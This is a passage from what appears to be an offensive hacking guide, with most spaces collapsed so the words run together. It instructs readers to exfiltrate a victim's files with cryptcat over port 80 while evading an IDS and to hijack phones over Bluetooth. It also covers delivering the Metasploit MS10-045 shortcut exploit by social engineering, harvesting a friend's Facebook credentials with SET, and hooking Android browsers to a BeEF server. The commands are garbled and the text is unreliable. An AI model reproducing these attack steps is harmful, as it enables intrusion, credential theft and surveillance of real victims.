Tocontinuetheoperation,youshouldevadethefirewallbysendingcryptcatoverport80.Evenifyouhaveshapedabackdooronyourvictim’ssystemsomeoftheadministratorsmaynoticethatport6996isopenwhichisnotnormalatall (forthem).

Networksarecapableofcommunicationontheinternetiftheykeeptheports80and443andmaybe25,53,110open.

Afteryou learnedhowtousecryptcatyoushouldsend it toport80with thealltraffic. It will look like any other binary data crossing the line even if it isencryptedand that is thereasonwhy it isundetectableand impossible toblock,theIDSisnotcapableofseeingwhatitcontains.

If you want to move a file from your victim’s system to yours without beingundetectedyoushouldsendafilewiththesamenameasthestolenfileacrosstheencryptedconnection,youcandoitbytypingthisinthecommandprompt:

cryptcat-lp80<topsecret.txtandthecommandpromptwillshowC:\>cryptcat-1p80<topsecret.doc

The next step is connecting to the victim’s system and put secret file on yourvictim’s system. Connect to the listener by typing cryptcat and the InternetProtocoladdressofyourvictim’ssystemandtheportnumbertothelistener.

cryptcat192.168.182.24880

Andafterdoingthisthefileyouwantthestealshouldcometoyou.Checkthefilealertafteragaintomakesureyouareundetected.

kwrite/var/snort/alerts

Youcannoticethatthefilehascrossedthoughport80undertheeyesofIDSwithoutbeingundetected.

Cryptcatisagrandlittleinstrumentformovinginformationoffthevictim’ssystemacrossthetypicalopenportswithoutanyofthesecuritydevicesdetectingit.

So,thismethodisoftenusedbyhackersandalotofdevicesarehackedinthiswaywithoutbeingundetected.Donotbeafraidoftrying!

Wanttotrickvictimsandmakethemyourvisitors?Youcanmakeitandthisbookisgoingtoshowyouhow.Redirectingvictimstoyourwebsiteiscrucialifwetalkabouthackingbecausefewmethodsusedinhackingincludethistrick.

So, if you wan to redirect any site from Google please go to Google Redirect

ExploitandaftergettingthereyoushouldenteryourURLinaboxonthatpage.

AfteryouenteryourURLpleaseclickonSubmitandGoogle’sURLshouldproduceanotherURLstartingwithgoogle.combutwithafewcharactersinplus,thatwillbeyourURL.AndnowyoucanstartusingitandanypersonshouldbedirectedtoyoursiteviayourURL.

Also, thereareseveralwebsitewhichare forbiddenbygovernmentbecause theyarebreakingthe lawsof theircountry, ifyouwant toaccesssuchawebsite theymightrequestyoutodownloadseveralfiles/programswhichin80%ofthecasesaremalware,sopleasedonotdownloadanythingstrange.

There is a trick you canuse if youwant to enterbannedwebsites thatdoesnotrequest any download, in order to start using it you should firstly openincloack.comusingyourbrowseroryoucanuseanyproxysiteyoutrustinsteadofthesuggestedone.

Afteryouchooseyourproxysite,searchforaboxthatisrequestinganURL,theURLyoushouldentermustbethebannedsiteURL.

ThelaststepisclickingonHideMeoptionandsurftheinternet.

Protect the sensitive data on your computer by putting it in a hidden folder, tocreateahiddenfolderonyoursystempleasefollowthenextindications:

1.GotostartmenuandclickonRun

2.Writecmdandpunchenterinordertoopenyourcommandprompt

3.Next,writeD:andstrikeenteragain

4.Writemdcon\andstrikeenter

5.Inplaceofmdyoucanuseoneofthefollowingwordsaux,lpt1,lpt2,lpt3uptolpt9

6.Youshouldopenthedirectoryandfindafilecreatedwiththenamecon

IfyouwanttodeletethatfolderWindowswillshowerror,butifyoureallywanttodoit,hereishowtodeleteit:

First, openCommandprompt ant typeD: andhit enter, after that type rd con\andifyouopenthedirectoryagainyouwillfindoutthatthefileisdeleted.

Asweknow,computerhackingisnottheonlytypeofhackingandtherearemanyothers,butmobilephonehackinghasbecomeveryfamousbecauseifyouhackamobilephoneyoucangetsensitivedataandyoucandoawholesetofactivitiessuchas readingmessages, getback thephone to the factory settings,ultimatelyswitchingonandoffthephone,changingthephone’sringingvolume,seecontactsorplayringtoneevenifthephoneisonsilentmode,allthoseactionswillmakethehackedphonelooklikeitwouldbecontrolledbytheevilestpowers.

*NOTE: The following method in phone hacking request a Bluetooth enabledphonebecauseitisbasedonBluetooth.

So if you want to hack amobile phone, you can succeed by following the nextsteps:

EntertheinternetandsearchforSuperBluetoothHack1.8,afteryoufinditpleasedownload and install it. After that make sure that your phone is in the list ofhandledhandsets fromthe linkdelivered,afteryougetthe .jar file , install itonyourphone.

Theinterestingandgoodthingaboutthismethodisthatyoudonothavetoinstallthesoftwareonthephoneyouwanttohackandthisisrisingupthemethod’sefficiency.

Forgettingintothenextstep,turnontheBluetoothofyourhandsetandafterthatpleaseopentheSuperBluetoothHackAppyoujustdownloadedandinstalled.

Next,youshouldselecttheconnectoptionandafterthatselectInquiryDevicesinordertolookforanymobilethathastheBluetoothenablednear/aroundyou.

Pairing between the phones is very important so your victim must have theBluetoothturnedon;aftertheapplicationfindsyourvictim’sphoneyoucanstartexploringit!

Most methods of hacking are requesting the Internet Protocol address andsometimesitistheonlythingthathackersshouldknowinordertostarthacking,butwhat if you could hide it? Itwill be another securitymeasure taken by youagainsthackers.ByhidingyourInternetProtocoladdressyouwillbeabletosurfthe internet anonymouslywithout leaving anymark that can guide to you, hideyourgeographicalpositionontheglobeandthemostimportant,tostaysafe.

The safest and securedway tohide your InternetProtocol is byusing a trustedVPN service, for example VyprVPN which will offer you the services with thehighestspeedonthemarket.

AVPNserviceisalwaysbetterthananyothermethodbecausetheserviceencryptsallyourinternettraffic,itiskeepingthespeedhighanddoesnothaveanyeffectonitincomparisonwithothermethodsandyoucanavoidlocationblockswithoutanyeffort.

Another method to hide your Internet Protocol is using website based proxyserverssuchasanonymouse.org,andbecauseitiswebbasedtheydonotrequestanydownloadorinstallationwhichishelpingyoutosavespace.

Also, you can use BCPS- Browser Configured Proxy Services and you can findhundreds,thousandsofthemforfreeontheinternet,theygiveyouafakeInternetProtocoladdressyouthatwillconfigureyourbrowserwithandstarthidingyouroriginal InternetProtocol address.Theonlyproblemwith thismethod is that ithasbecameverypopularthoughthetimeandasitdoesnotrequestmoneymostofthepeopleuseitbecausetheyprefertonotpayandgetasecondqualityservice

and as an effect they perform too slow under normal parameters which is notlikelyatall.

Hackingcansaveordestroylives,itcandestroyavictim’slifeorahacker’slifebuteverythingdependsabouthowbothofthemareplaying,itisdependingmoreonthehackertochoosewhathewantandthinkreallygoodbeforehestarttheactionanditisdependingonthevictim’sattitudeaswellbecauseinarealgamethereisnot only a player. Everything depends on how both players are handling thesituationandiftheyknowtoturnitintheirfavor.

Now thatwe learnedhow tohidean InternetProtocoladdress,weshould learnhowtofindtheexactlocationofanyInternetProtocoladdresssoherewego.

ThismethodrequiresaLinuxsystemandifyouhaveityoucanstartimmediately.FireupyourKalisystemandcontinuewithopeningaterminal.

Next,youwillneedtheDatabaseandyoucandownloaditfromMaxMindwhichisa big company that owns the database of the world because it contains everyInternetProtocolAddressaccompaniedby itsGPScoordinateson theglobe,zipcodeandallthedetailsyouneedinordertoknoweverythingabouttheInternetProtocol Address and its place on the globe no matter on which corner in theworldistheIPlocatedandyoucanobtainitbywritingthenexttext:

kali > wget -N -qhttp://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz

andthenyouwillhavetounzipit

kali>gzip-dGeoLiteCity.dat.gz

root@kali:~#wget-N-qhttp://googlecode.com

AfterthatyouwillhavetoinstallPythonscript(pygeoip)inordertocontinuetheoperationsopleasedoitbecauseithelpsalotinreadingthedatabase.

You can get it by writing the next text: kali > wgethttp://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

Andthecomputerwillshowsomethingsimilarto:

root@kali:~#wgethttp://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

—2015-080-1911:15:29—http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

Resolving pygeoip.googlecode.com (pygeoip.googlecode.com) … 74.125.69.82,2607:f8b0:4001:c05::52

Connectingtopygeoip.googlecode.com(pygeoip.googlecode.com)|74.125.69.82|

HTTPrequestsent,awaitingresponse….200OK

Length:14672(14K)[application/empty]

Savingto:`pygeoip-0.1.3.zip’

100%[============== ]14,672—.–K/sin0.1s

—2015-080-1911:15:29(124KB/s)-`pygeoip-0.1.3zip’saved[14672/14672]

root@kali:~#

And after that, you will have to unzip it by using the next syntax kali > unzippygeoip-0.1.3.zip,andthescreenwillshowyousomethingsimilarto:

root@kali:~#unzippygeoip-0.1.3.zip

Archive:pygeoip-0.1.3.zip

Inflating:pygeoip-0.1.3/PKG-INFO

Inflating:pygeoip-0.1.3/README

Inflating:pygeoip-0.1.3/setup.cfg

Inflating:pygeoip-0.1.3/setup.py

Inflating:pygeoip-0.1.3/pygeoip/const.py

Inflating:pygeoip-0.1.3/pugeoip/util.py

Inflating:pygeoip-0.1.3/pygeoip/__init__.py

Inflating:pygeoip-0.1.3/pygeoip.egg.info/dependency_links.txt

Inflating:pygeoip-0.1.3/pygeoip.egg.info/PKG-INFO

Inflating:pygeoip-0.1.3/pygeoip.egg.info/SOURCES.txt

Inflating:pygeoip-0.1.3/pygeoip.egg.info/top_level.txt

root@kali:~#

Nextyoushoulddownloadsometoolsforpygeoip:

kali>cd/pygeoip-0.1.3

kali>wgethttp://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

kali>wgethttp://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg

root@kali:~/pygeoip-0.1.3#wgethttp://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

—2015-08-19 11:30:54—http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

Resolvingsvc.python.org(svc.python.org)….82.94.164.164,2001:888:2000:d::a4

Connectingtosvc.python.org(svc.python.org)|82.94.164.164|:80…connected.

HTTPrequestsent,awaitingresponse…200OK

Length:7575(7.4K)[text/plain]

Savingto:`ez_setup.py’

100%[================== ]7,57547.1K/sin0.2s

2015-08-1911:35:21(47.1KB/s)-`ez_setup.py’saved[7575/7575]

root@kali:~/pygeoip-0.1.3#wgethttp://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py.5.egg

—2015-09-1911:45:02 —http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg

Resolvingpypi.python.org(pypi.python.org)…199.27.79.223

Connecting to pypi.python.org (pypi.python.org) |199.27.79.223| : 80 …connected.

HTTPrequestsent,awaitingresponse…301MovedPermanently

Location: https://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg[following]

—2015-08-19 11:45:54—https://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5egg

Afterdownloadingyoushouldstartmovingandinstallsomesetuptools:

kali>mvsetuptools-0.6c11-py2.5.eggsetuptools-0.7a1-py2.5.egg

kali>pythonsetup.pybuild

kali>pythonsetup.pyinstall

Anditshouldshowupsomethinglikewhatisbelow:

root@kali:~/pygeoip-0.1.3#mvsetuptools-0.6c11-py2.5.eggsetup

tools-0.7al-py2.5.egg

root@kali:~/pygeoip-0.1.3#pythonsetup.pybuild

runningbuild

runningbuild_py

creatingbuild

creatingbuild/lib.linux-i686-2.7

creatingbuild/lib.linux-i686-2.7/pygeoip

copyingpygeoip/__init__.py->build/lib.linux-i686-2.7/pygeoip

copyingpygeoip/const.py->build/lib.linux-i686-2.7/pygeoip

copyingpygeoip/util.py->build/linux-i686-2.7/pygeoip

Nowyouhavetomovedatabasetopygeoipdirectory.

Afteryoumakesurethatyouhavethedatabasewhereitissupposedtobeandthepygeoip installed on your system you should start to interrogate the databaseusingpygeoip.TakeattitudeandstartaPythonshellandafterthatyoushouldbewelcomedby“>>>”whichconfirmsthatyouareinanpythonshell,continuebyimportingthemodule:

>>>importpygeoip

>>>gip=pygeopip.GeoIP(‘GeoLiteCity.dat’)

Afterthatyoushouldbereadytostarttheinterrogation,golookwhereisGooglelocated.

>>>rec=gip.record_by_addr(‘64.233.161.99’)

>>>forkey.valinrec.items():

…print“%s:%s”%(key,val)

…

Iftheoperationisgoingrightthenyoushouldseeascreenthatindicatessimilarcontenttowhatisbelow:

>>>rec=gip.recorded_by_addr(`64.233.161.99’)

>>>forkey.valinrec.items():

…print“%s:%s”%(key,val)

…

City:MountainView

Region_name:US

Area_code:650

Longitude:-122.0574

Country_code3:USA

Latitude:37.4192

Postal_code:94043

Dma_code:807

Country_code:US

Country_name:UnitedStates

>>>

Asyounoticed,wefoundoutGoogleIPaddress.

Butdoesyourcuriositygetsatisfiedonlywiththat?Thatwasjustaconfirmationofthesuccessyouexpectedbuttherealsecretofsuccessisthatyoushouldneverstoptrying,sotrynowtofindoutthelocationoftheIPaddressofcnn.com.

>>>rec=gip.record_by_addr(`157.166.226.25’)

>>>forkey,valinrec.items():

…print“%s:%s”%(key,val)

…

City:Atlanta

Region_name:GA

Area_code:678

Longitude:-84.388

Country_code3:USA

Latitude:33.749

Postal_code:30348

Dma_code:524

Country_code:US

Country_name:UnitedStates

>>>

CNN’s Internet Protocol was just discovered due to the mix of database andpygeoipwithsomeattentionandwork,ahackercoulddoanything.

* IMPORTANT NOTE: all the presented operations should be done with amaximumofattentionandpatience.Skills are crucial in thiskindofoperationsandalotofexerciseisneededinordertogetthesuccessfromthefirsttimeyoutry.Make sure you respect all the syntaxes and codes because in hacking eventypingwrongalettercouldbecrucialandguidewrongthewholeoperationendingup with a huge failure ormaybe a new discovery. Informatics are in the samefamilywithmathematicswhereyouhave to find solutions forproblemsaswell,think and react with speed, be very skilled and the most important commonfeature is that if you make just a small/ unnoticed mistake you might destroyliterallyeverything.

Are you interested in cloning websites? If you want to try all the methods ofhacking then your answer is yes for sure because there aremethods of hacking

which are requesting to redirect victims to your websites which should lookidentical as the ones youwant to hack, in fact that is the key to succeed!Whycomplicate yourself and waste your precious time and ideas on creating anidenticalwebsite?Youcanjustcloneitandyourhackishalfdone.

HTTrack is the instrument to use in copyingwebsites, prepare your hard drivebecauseHTTrack ismaking copies of anywebsite youwant and after that it iscopyingittoyourharddrive.Twinsarealwaysdifferentandtherewillalwaysbeagood twin and a bad twin, the same is with creating these websites, you willproducethebadtwinwhoisdoinggoodthingsforyou.Thetoolisefficientifwetalk about social engineering and searching for any data on the clonedwebsitewithoutinternetwhichisagreatfeature,youcanusethistoolonaWindowsandLinuxsoftwarebecausefortunatelytherearetwoversionsofHTTrack.

BeginwithdownloadingandinstallingHTTrack,youcaninstallitbytypingthesyntaxkali>apt-getinstallhttrack.

Afteryouhaveinstalledit,movetothenextstepandopenit,afterthat,pleasestartlookingforthehelpfile.Kali>httrack—help

root@kali:~#httrack--help

HTTrackversion3.46(compiledJun232012)

Usage:httracks<URLs>[-option][+URL_Filter>][+<mime:MIME_FILTER>][-<mime:MIME_FILTER]

Withoptionslistedbelow:(*isdefaultvalue)

Generaloptions:

0pathformirror/logfiles+cache(-0path_mirror[,path_cache_and_logfiles])

(—path<param>)

%0chrootpathto,mustber00t(-0%root_path)(chroot<param>)

Actionoptions:

wmirrorwebsites(—mirror)

Wmirrorwebsites,semi-automatic(asksquestion)(—mirror-wizard)

gjustgetfiles(savedinthecurrentdirectory)(—getfiles)

icontinueaninterruptedmirrorusingthecache

YmirrorALLlinkslocatedinthefirstlevelpages(mirrorlinks)(—mirrorlinks)

Proxyoptions:

Pproxyuse(-Pproxy:portor–Puser:pass@proxy:port)(—proxy<param>)

%f*useproxyforftp(f0don’tuse)(—httpproxy-ftp[=N])

%busethislocalhostnametomake/sendrequeststo(-%bhostname)(—

bind<param>)

Pleaseusethissyntaxtotellthetoolwheretosendthesitekali>httrack<theURLofthesite>[anyoptions]URLFilter-O<locationtosendcopyto>.

UsingHTTrackinstrumentisnotcomplicated,youjustneedtoplaceitatthesiteyouwanttocloneandthenguidethe–Otoadirectoryinyourharddrivewhereyouintendtosavethewebsite.Whatisahackerthatdoesnottesthiswork?Wellthathackerisnotaprofessionalone,sogotestthetoolyoujustinstalled.

Ifyouwilltrytocloneforexamplethewebsitewebscantest.comusingthefollowingsyntaxkali>httrackhttp://www.webscantest.com-O/tmp/webscantest,youwillget:

root@kali:~#kali>httrackhttp://www.webscantest.com-O/tmp/webscantest

WARNING!Youareusingthisprogramasaroot!

Itmightbeagoodtousethe-%Uoptiontochangetheuserid:

Example:-%Usmith

MirrorlaunchedonWed,19Aug201516:02:45byHTTrackWebsiteCopier/3.46+libhtsjava.so.2[XR&CO’2010]

Mirroringhttp://www.webscantest.comwiththewizardhelp..

*www.webscantest.com/jsmenu/gotoframme.php?foo3D+bar%3D+url%3Dhttps%3A%2F%2F

13/27 :www.webscantest.com/jsmenu/gotoframme.php?foo%3D+url%3Dhttps%3A

*www.webscantest.com/business/account.php?accountId=123456789-abcdef(1277bytes)

84/88: www.webscantest.com/business/access.php?serviceid=123456789(1266bytes)

85/88:www.webscantest.com/business/account.php?accountid=123456789-abcdef(1277bytes)

Done:www.webscantest.com/bjax/servertime.php-OK

ThankyouforusingHTTrack!

Ifsomethingsimilartowhatisaboveisalsoonyourscreenitmeansthatyoujustmadeacloneofeverythingisonthewantedsite.

Thenextthingtodoafteryoucopythewebsiteonyourharddriveistolookatthewebsite clone and investigate it. Simply place your browser to/tmp/webscantest/www.webscantest.com/login.htmltoseewhatisgoingonwiththeclonewebsite.

Donotyouseeanydifference?Exactly, that is thepoint.Youreachedyourgoal

andcreatedexactlythetargetwebsitebutitiscloned.

Hackingisnotasimpleoperationbecauseyouneedtobuildaplanforthetargetwebsite before you get into the action, actually, effective hacking is only about30%whilewaiting and searching for flaws andvulnerabilities in a system takesthe rest of 70% of the time. So, you can not do a successful hack very quick,patienceiscrucial!

Let’scontinuewebsitehackingroadbylearninghowtospiderthetargetwebsitebecauseyouneedtodoitbeforetheattack.Youhavetwowaystofollowandyouarefreetochoosebetween:spideringthewebsitemanuallyandspendalotoftimeoneverypageorspideringthewebsiteautomaticallyusingatoolspeciallycreatedforthat,andbecauseyouknowthefirstway,let’sexplorethesecondwayandfindouthowtodoitbysimplyfollowingthenextinstructions:

If you areusing aLinux systemyoudonothave to install theused toolnamedWebScarabbyOWASPbecauseyouhaveinyourKalisystem.

Start with opening WebScarab and when you open it, it should open a GUIinterfacewithawhite/graybackground.

Thenextstepistoconfigureyourbrowserbeforeyoustartspidering.ThetoolWebScarabisusingaproxyon127.0.0.1on8008,makesureyourbrowserisusingthesamesettings.

After that, you should place the tool on a website by typing it in the AllowedDomains”windowandgotothebrowseryouuseandnavigatetothewebsiteyoujustprovidedandifyouareontherightway,thetoolshouldstarttofillthemainwindowwitheachaddressconnectedonthatpage.

Using this tool youwill be able to notmiss anywebpage or link on your targetwebsiteandyouwillalsosavealotoftime,takefulladvantageofthetechnologythatexistnowadaysinordertoreachyourgoal.WebScarabhelpyouhackbetterthanever.

More information means more power to action and that represents the majorreasonwhywewillremainunderthesameclasswhichishackingwebapplicationsandbecomeskilledathowtohack thosewebsiteswhichrequestauthentication.Tostartthistripyoudonotneedamapbecausethisbookwillbeyourmap,youneedjusttofollowthenextsteps:

GonavigatetheinternetandsearchforDVWA-DamnVulnerableWebApplicationandonceyoufinditpleaseinstallitonyoursystemtostartpracticingyourhackingskills.Eveniftheapplicationisrelativelyoldyoushouldbeginwithitbecauseyouwillprovethevaluesofwebapplicationhackingandbecauseitrepresentsasafeatmospheretoworkin.YoucaninstalltheapplicationonaLinuxsystemoryoucanchoosetoinstalltheMetasploitableoperatingsystembecauseDVWAisalreadyinstalledthere.

Ifyouchoosethesecondoption,startbysearchingyourInternetProtocoladdressusingtheIceweaselbrowserinKali,afteryousearchedforyourInternetProtocoladdress, a white page should appear with four options on it including DVWA,pleaseselectDVWAbyclickingonitslink.TheDVWAloginscreenshouldappearafteryouopenitrequestingsomelogindetailsbutdonotloginyet.

Next, on this kind of attacks, you should start using Burp Suite which isfortunatelyalreadybuiltintoKali,whenyoustartusingityoushouldbewelcomedwith aGUI fromBurp Suit and right there you should configure Burp Suite asbeingyourproxy.

Youshouldalsoknowthattherearethreecategoriesofwebbasedauthentication:BAA-BasicAccessAuthentication,DAA-DigestAccessAuthenticationandFBA-FormBasedAuthentication.

The first category is very easy to break into because it is working with Base64encoding,thisbasetransformsbinaryinformationtotextualinformationwhichiseasytodecode.

The second category ismore secure than the first one and obviously harder tobreakbut oneof its vulnerabilities is about attacks, it cannotbe attacked via amethod like rainbow tables but remember that everything is hackable, you justhavetousetherightmethod.

Thethirdcategoryandthelastoneatthesametimeitrepresentsthemostusedfigure of authentication in HTTP. This is the most common figure ofauthenticationusedbycontemporarysitesbecauseitiseasytouse,theusergetsaccessifhesendstherightrequestedinformationtotheserver.Itisnotsimpletohackitbecauseitisusingseveralformsofencrypting.

Nowthatyouknowthatyoucanmovetothenextstep,logintoDamnVulnerableWebApplicationbydeliveringablendofusernameandpassword.StudythepagewithattentionuntilyoufindaDVWASecurityoptionandsetthesecuritylevelto“high”.

Now,gobackfromwhereyoustarted,theloginscreenandgivethesourcecodearegardandyoucannoticetheusernameturnedintounusualcharacterswhichcanbeworninaSQLinjectionandthesameobservationinthepassword’scaseandthosetransformationsaredonejusttoavoidtheoptionofaSQLinjection.Afterthat, the two character strings are thrown into a SQL interrogation to jog inoppositiontoauthenticationdatabase.

And now you are able to see the other face of the letters you type using yourkeyboard.

Nowlet’sgetawayfromthisareaandmovetoanotherone,Windows7shouldbehacked too!HackingWindows 7 can be such a pleasure and a challenge at thesametime.Windows7hasvulnerabilityinmanagingWindowsShortcutfilesandweshouldtakefulladvantageofit,tosendamaliciousfileandtakefulladvantage

ofthewellknownvulnerabilitypleasebeginbyfollowingthenextinstructions:

OpenyourMetasploitoperatingsystemandthenfilltheexploitusingwhatfiguresasMS10-045inMicrosoft’sSecurityBulletinsandtakesprofitofashockabsorberexcessintheshortcutdll.

Fillitbyusingthis:msf>usewindows/ms10_045_shortcut_icon_dllloader.

After that, pay extra attention to study better the exploit by requesting itsinformation.Youwillnoticethattheextensorsays:

“This module exploits vulnerability in the handling of Windows Shortcut file(.LNK)thatcontainsaniconresourcepointingtoamaliciousDLL.”

Now, you should produce a shortcut that once clicked by anyonewho uses thetargetsystemwilllettheexecutionofyourmaliciousfilesocontinuewithsettingup the options and start by setting the Payload and continuewith setting yourInternetProtocolasLHOST.Afteryousetupeverythingyouneedyoucanstartbywriting“exploit”inordertostartgeneratingone.

Whatyoushoulddonextistosendyourcreationtoyourvictim,youwillhavetousesomesocialengineeringskillstosucceed.Thinkaboutallthespammessagesyouwerehighly tempted toclickonandget inspiration fromthem, forexamplethose sites which provide you great technical services if you give them yourinformationorthemessagesthatguaranteemillionsorbillionsofdollarsjustbyoneclick.Afteryoudecidewhichliewillcoveryourmaliciousplan,sendittothevictimandwaitbecausethevictimwillbewelcomedwithanalert thatneedsanallowingclicktorunyourcodesobeverycreativeinordertoreachyourgoalandgetyourclick!

After the victim gives you indirectly the permission to hack their system,Metasploitwillsetuptheconnectionbetweenyouandyourvictim.

Your success will be providedwhen youwill be welcomed by yourmeterpreterprompt, and once you are greeted you can take full advantage of the hackedsystemanddowhatyourheartallowsyouordoandwhatyourmindwantsyoutodosuchascollectingdataonthehackedsystemorusingittohackanothersystemoranythingyouwanttodo.

Wearehumansandwehavetoworkwithhumansevenifsomeofusdoesnotlikeit,sometimesyoushoulddothingsyoudonotlike.AsAlbertEinsteinsaidhumanstupidity is infinite, but there is another thing that is infinite and he forgot tomentionit,wearetalkingabouthownaivearesomeofus.Howcouldyoubelieveeverythingwithout even questioning yourself? That is one of themajor reasonswhyhacking attacks are taking a considerable growth. Inhacking,despite skillsand attitude and other features you need to be very creative as well becausehackersare takingadvantageof everything that is around themand that iswhytheyareusingwhatisnowadaysknownassocialengineering.

Sobelowyouwillfindsuchagreatinstrumentusedinsocialengineeringinorder

tostealcredentials.

TrustestSECisofferingusausefultoolcalledSEToolkitandhereisanexampleofhowtouseitinanattack:

GotoTrustestSECwebsiteanddownloadthetoolwhichismentionedaboveandafterthat,installit.

Next,startusingthetoolbyopeningitandwritingsetoolkitafteropeningupbashandyouwillbegreetedwithaquestion,answeritandthefollowingmenushouldshowup:

TheSocial-EngineerToolkit(SET)[–]

Createdby:DavidKennedy(ReL1K)[–]

Version:6.0.4[–]

Codename:`Rebel’[–]

FollowusonTwitter:@TrustedSec[–]

FollowmeonTwitter:@HackingDave[–]

Homepage:https://www.trustedsec.com[–]

WelcometotheSocial-EngineerToolkit(SET)

TheonestopshopforallofyourSEneeds.

Joinusonirc.freenode.netinchannel#setoolkit

TheSocial-EngineerToolkitisaproductofTrustedSec.

Visit:https://www.trustedsec.com

Selectfromthemenu:

1)Social-EngineeringAttacks

2)Fast-TrackPresentationTesting

3)ThirdPartyModules

4)UpdateTheSocial-EngineerToolkit

5)UpdateSETconfiguration

6)Help,creditsandabout

99)Exitthesocial-engineertoolkit

Set>_

You should choose the firstoption from themenu, soyouwillwrite 1 andafter

thatpleasehitEnter.

Thenextstepischoosinganattackvectorfromthenextmenuthatshouldpopup:

TheSocial-EngineerToolkit(SET)[–]

Createdby:DavidKennedy(ReL1K)[–]

Version:6.0.4[–]

Codename:`Rebel’[–]

FollowusonTwitter:@TrustedSec[–]

FollowmeonTwitter:@HackingDave[–]

Homepage:https://www.trustedsec.com[–]

WelcometotheSocial-EngineerToolkit(SET)

TheonestopshopforallofyourSEneeds.

Joinusonirc.freenode.netinchannel#setoolkit

TheSocial-EngineerToolkitisaproductofTrustedSec.

Visit:https://www.trustedsec.com

Selectfromthemenu:

1)Spear–Phishingattackvectors

2)Websiteattackvectors

3)Infectiousmediagenerator

4)CreateaPayloadandListener

5)Massmailerattack

6)Arduino-Basedattack

7)Wirelessaccesspointattackvector

8)QRCodegeneratorattackvector

9)Powershellattackvectors

10)ThirdPartyModules

99)Returnbacktothemainmenu

Set>_

The best option to choose is the second one because its efficiency has beenproofed,toselecttheoptionpleasetype2andhitEnteragainonyourkeyboard.

Youwillbeguidedtoalistofsevendifferentattackvectorsandtheyareallverygood in social engineering but the best are Credential Harvester, MetasploitBrowser, and Java Applet Attack. If youwant to have your friend’s log in datafrom Facebook you should select Credential Harvester Attack Method andSEToolkitwillhelpyoubycopyinganywebsiteyouwanttoandmuchmorethanthat,itwillinsertacredentialstealingcodetotheHTML.

Youshouldbegreetedbyascreensimilartowhatisbelow:

The firstmethodwill allowSET to importa listofpre-definedwebapplicationsthatitcanutilizewithintheattack.

Thesecondmethodwillcompletelycloneawebsiteofyourchoosingandallowyoutoutilizetheattackvectorswithinthecompletelysamewebapplicationyouwereattemptingtoclone.

The thirdmethodallowsyou to importyourownwebsite ,note thatyoushouldonlyhaveanindex.htmlwhenusingtheimportwebsitefunctionality.

1)WebTemplates

2)Sitecloner

3)CustomImport

Set:webattack>_

IfyouchoosethefirstoptionyouwillfindoutthatSEToolkitownsaFacebookloginpagetemplatebuiltintoit,inordertoletSEToolkitconnecttoyou,youshouldgive ityour InternetProtocoladdressandensureyouchooseport80andput itonwardyourIP.

Andyoushouldbegreetedwith:

[-]CredentialharvesterwillallowyoutotheclonecapabilitieswithinSET

[-]toharvestcredentialsorparametersfromawebsiteaswellasplacethemintoareport

[-]ThisoptionisusedforwhatIPtheserverwillPOSTto

[-]Ifyou’reusinganexternalIP,useyourexternalIPforthis

Set:webattack> IP address for the POST back in Harvester/Tabnabbing :10.0.1.82_

Next,youmustgetApacheinstalledonyoursystem,SEToolkitwillpresentyouitswebtemplatesandyoushouldusetheFacebookone.

Yourscreenshouldshow:

1. JavaRequired

2. Google

3. Facebook

4. Twitter

5. Yahoo

Set:webattack>Selectatemplate:3_

Andbecausewesaidthatwewanttousesocialengineeringonafriend’sFacebookaccount,youhavetotypenumber3andhitEnterkey.

Afterselectingtheoption,yourscreenissupposedtoshow:

[*]Cloningthewebsitehttp://facebook.com

[*]Thiscouldtakealittlebit

The best way to use this attack is if username and password from fields areavailable.Regardless,thiscapturesALLPOSTsonawebsite.

[*]Apache isset toON.Everythingwillbeplaced inyourwebrootdirectoryonapache.

[*]Fileswillbewrittenouttotherootdirectoryonapache.

[*]ALLfileshavebeencopiedto/var/www

{Pleasereturntocontinue}_

And the last thing you should do is sending to your friend an email with yourInternetProtocoladdressaslinkandwaitforyourfriendtoclickonit.

Statisticsshowthat1billionpeopleaccessmonthlyFacebookonlyfromUnitedStates,in1billionpersonsclearlymorethanhalfofthemarenaïveandthatisanotherreasonwhyweshouldlearnanewmethodtohackFacebookusingsocialengineering.Tostart,kindlyfollowthenextsteps:

YoushoulduseLinuxtorealizethishackbecauseyouwillneedinstrumentslikeMetasploitandBeFF.

First,openthefirsttoolmentionedafteryoufireupKaliLinux,youcanopenthetoolbywritingthesyntaxkali>msfconsole.

Andyoushouldbegreetedwithasimilarscreen:

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%http://metasploit.pro%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%

Now,youshouldsearchfortheexploitforthehackandtrytofinditbywritingthesyntaxmsf>searchplatform:androidstockbrowser

And if you do it you are supposed to get this moduleauxiliary/gather/android_stock_browser_uxss

Loadthismoduleusingthissyntaxmsf>useauxiliary/gather/android_stock_browser_uxss

Andyourscreenshouldshowthis:

MatchingModules

=============

NameDisclosureDateRankDescription

–-––––––––––––-

Auxiliary/gather/android_stock_browser_uxssnormalAndroid

OpenSourcePlatform(AOSP)BrowserUXSS

Msf>useauxiliary/gather/android_stock_browser_uxss

Msfauxiliary(android_stock_browser_uxss)>info

Name:OpenSourcePlatform(AOSP)BrowserUXSS

Module:gather/android_stock_browser_uxss

License:MetasploitFrameworkLicense(BSD)

Rank:Normal

Providedby:

RafayBaloch

Joev<joev@metasploit.com>

Basicoptions:

Getsomedataaboutthemodulebyusingthesyntaxmsf>info

Afterthat,checkwhatoptionsyouneedtosetforthemoduletomakeitworkbutthemostimportantissettingREMOTE_JS.

IfyoudidalltheworkfromtheaboverightyoumayopenBeFFtoolandthenextstep isgoingback toMetasploitnowandensure thatyouareusing theInternetProtocol of the BeEF server, set the JF to BeEF hook msf > set REMOTE_JShttp://192.168.1.107:3000/hook.js

